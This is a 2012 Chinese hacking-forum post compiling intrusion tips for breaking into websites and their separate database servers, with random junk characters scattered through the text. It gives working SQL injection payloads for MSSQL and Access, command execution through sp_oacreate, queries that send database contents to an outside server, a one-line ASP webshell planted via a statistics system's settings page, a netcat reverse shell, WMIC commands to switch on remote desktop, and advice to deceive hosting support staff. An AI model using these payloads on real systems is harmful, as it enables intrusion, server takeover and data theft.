找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3193|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
SA点数据库分离技术相关
6 c: C( P. u5 I+ s2 m! K* ?% s/ v
& a; N8 k/ r: @3 s( l; l' C0 X- g' X2 Y  R3 ^9 ^& ^/ N' u
SA点数据库分离搞法+语句:
9 j0 v( b7 x; d: o( H% G, P, A
  O; ]* B# ]7 b* d! p% S% \; k注射点不显错,执行下面三条语句页面都返回正常。
0 j# l3 O0 E5 J$ ?and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
8 D- J# d) d7 R6 `and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')" K9 X% m8 `1 a, n) r' M
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')) z/ h; X) n" a& T2 [
可以列目录,判断系统为2000,web与数据库分离
; c+ Z; ~7 ]8 i% t: q% w遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
; h% C! ]9 J7 U在注射点上执行
3 V* l# p! k. e& `& g0 w* I: B/ Z; sdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--# e, r; \' b* y% N" }5 J) C9 a
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP" `  ?  c) j( M1 C( d3 |
还有我用NC监听得其他端口都没有得到IP。0 `3 [. ~3 B+ z7 ~; N

1 @0 ?+ F3 C1 X$ T. A4 `3 ?% I通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
- H6 O% A, N# }3 i; c' V5 k'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
) P8 T! s! f& F$ X$ g
) U+ p2 E- d4 T- ^* E+ ^+ V2 h;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--
8 w" L0 Q: X/ ~; M+ \) D5 U0 k, z/ m2 p, k
现在就猜想是不是数据库是内网而且不能连外网。
% @! V. J( C7 \( u1 l0 `6 w+ U# T9 ]8 W9 w

/ l( S, f* b7 X. z  g7 v: qaccess导出txt文本代码
$ n/ i  H3 T7 t# w" }: y, c. dSELECT * into [test.txt] in 'd:\web\' 'text;' from admin
$ o6 z+ i8 c, b. W. ~' f" s) d" l9 z/ C  N
' W3 @7 E1 t5 o6 O0 b3 y

; r: a6 S+ [& P6 q自动跳转到指定网站代码头- g7 r! T+ G' _' S" V
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>) D& T9 q: W8 l& C

! V% ]  K- N' q( f; W1 C( y3 C
$ d4 j; f. Y: K  L9 X入侵java or jsp站点时默认配置文件路径:+ y1 |: |- z8 E( Z9 n/ E; I
\web-inf\web.xml
) N1 v) m& A/ a6 j8 ^! ~tomcat下的配置文件位置:' O  c+ o. [9 f5 c/ t+ U6 R, U8 U9 s. D
\conf\server.xml            (前面加上tomcat路径)
# n$ Y) r' o5 h8 Y$ e+ n\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
: W8 F0 I( r3 g$ B" M
/ j8 x" \' A4 r6 w5 D/ T' ^1 H& a2 s& [. I' j5 v0 Y& o
6 |8 d* z. r3 p/ C! W
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:4 X. ], O; Z+ B
-1%237 G: Y" O+ H' n" f6 m
> 0 I. i, ^0 F; ]0 ?& i6 G
<
: v7 N7 ?  v) ]4 p! \) C1'+or+'1'='1. L# Q" {: r; D% ?1 O) N
id=8%bf
. d% K2 ~$ G" D% X$ u9 w% K
, r$ {" u6 Y  y1 B5 H全新注入点检测试法:
( Z# t& J8 `5 v/ y, O* M% r在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。. w5 l3 o" c, s0 B+ P& l/ w
7 m! o- ?+ Q5 E
在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。
' o4 {1 ]9 e1 q0 T) A& `9 t% g9 o1 U
搜索型注入判断方法:* ^' i% H+ ?* }0 J, c0 o$ Z+ v
北京%' and '1'='1' and '%'='
0 Z& g: K6 F: R! l! h0 M2 \& C北京%' and '1'='2' and '%'='; U+ h, K* g# r! n1 ^

, @3 G0 s4 D- c* ^* k
5 @6 y2 h! \7 j5 b' pCOOKIES注入:
. P6 T/ q0 a1 Q: a0 S
( j( k7 m) l/ Q8 O4 ^javascript:alert(document.cookie="id="+escape("51 and 1=1"));
7 F0 l$ ~. k! W3 |6 j
$ a$ A/ K9 A4 }7 {% G8 W6 K2000专业版查看本地登录用户命令:
3 _' f1 \$ r5 c. g. @; enet config workstation
! s: [0 [& T3 c9 t4 F$ @
5 k; L' u9 Y7 b- m5 C2 G0 l6 j
) x& L7 S5 y: |( u) t* ?1 O2003下查看ipsec配置和默认防火墙配置命令:) o; g- l# C5 d) Y- `0 ?- Z3 l
netsh firewall show config$ }" p9 C" V: B* V: E
netsh ipsec static show all# b7 a* Q  ]5 A' f/ T
$ E8 h- L2 }; c
不指派指定策略命令:8 N$ q9 z. W* b% f
netsh ipsec static set policy name=test assign=n  (test是不指派的策略名)
( B% G3 z3 x, K3 i/ z. N7 Fnetsh ipsec static show policy all  显示策略名! z+ T& [8 Y1 f9 k! o7 p0 W
. \' Q( p# S4 j5 B. n- Y1 L

3 \3 C, z; ]. |9 B- b/ I猜管理员后台小技巧:' {0 T! Y+ R" C, ?- s
admin/left.asp + j2 d7 j- Q8 @; Y
admin/main.asp. I6 S6 L; y: d9 D+ v& {/ s
admin/top.asp8 G' O. \  c/ u* N( i
admin/admin.asp
8 y1 f4 y9 y1 M0 U1 O3 d会现出菜单导航,然后迅雷下载全部链接
1 i* [& M1 Q3 }& A
; _7 {* i' B% f8 `$ N! x0 D8 v9 Y; ?3 ^6 h* _: \) S
社会工程学:
8 w* r! r; V1 y+ N! g9 }用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人) X2 ^6 F0 t7 l9 A* q- _) O+ v
然后去骗客服
( N+ I, \: _1 r3 s" H/ G  c  ?! j5 i( u
" X% D2 T. u$ ?- e; K7 d
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
8 p7 Y; n! s9 t- e3 o查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">, 5 B  V0 D7 \8 |8 q' X. b
  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
' `) g$ D' a6 w) k% Q' t, E" B8 V' @: e8 r

/ Q! g; u* x: ^5 L4 V
7 R" L5 }  s/ }2 V( ~+ K6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)
1 t0 |0 H9 |/ R$ V& U7 j
. J2 r% K3 o8 c2 G. W8 w# [, w5 Y- Z/ L& n. x4 U8 _
6 R$ |% f: B7 H* @
CMD加密注册表位置) h: h% W2 P% n
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
! b2 o) w) |' SAutoRun3 y4 G6 z$ {+ s5 ]
$ f1 N% W" W/ j
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor# e# |2 p4 f1 {0 C0 _/ P
AutoRun8 l7 L7 S+ Q% |0 ^
0 H! @  k/ o6 |5 n" |
  k" Z0 K1 T9 Q) e
在找注入时搜索Hidden,把他改成test! E/ y0 d  O6 Q  C  \" t3 L
2 q( i6 w, c# v

( Y/ M( X4 m/ g# d% a
3 _% e$ }( |0 d0 O; S$ i, imstsc /v:IP /console 6 U  @& f, L* [: E; w, e. v: y8 J) E
# K! _0 s9 q1 L9 v/ }0 F3 G5 h
0 x9 X" W) a8 z& c
一句话开3389:% }1 l9 {, i" l0 Y* j
1 G" l5 J- _. [1 _* r9 l) L) P
最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  ( E9 m2 M+ m2 Y7 L( u
开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了./ Z+ x% Z% Q& `8 Z

7 E- e- K" ^: p2 P
: y1 B7 G/ o8 K知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
/ B$ p: r  b+ I+ vInsert into admin(user,pwd) values('test','test')
, P$ Z; j1 }  P, ?- D8 C3 S" f, b: V1 z5 J( h4 i& l/ J% j

( s5 b( a2 f7 o; O# i$ VNC反弹# }+ j9 H% m3 t6 U& C; ?
先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   7 C) i" n% ]  {0 |" A% ~/ A& n
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
1 I+ P- `5 X& ?- _' r% G7 v: [9 v( C
3 `. y$ p) R: |9 g# ?1 f1 h' z9 E; F2 i: Q/ X( _# J
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
0 e  J" U( k. z
+ a. b9 D# D$ K& t0 b有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录8 E( Y' S8 {  Q
例如:* C& k# K) F6 }) @
subst k: d:\www\ 用d盘www目录替代k盘7 W1 {4 H+ H& c2 ^% D: U& o
subst k: /d  解除K盘代替
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表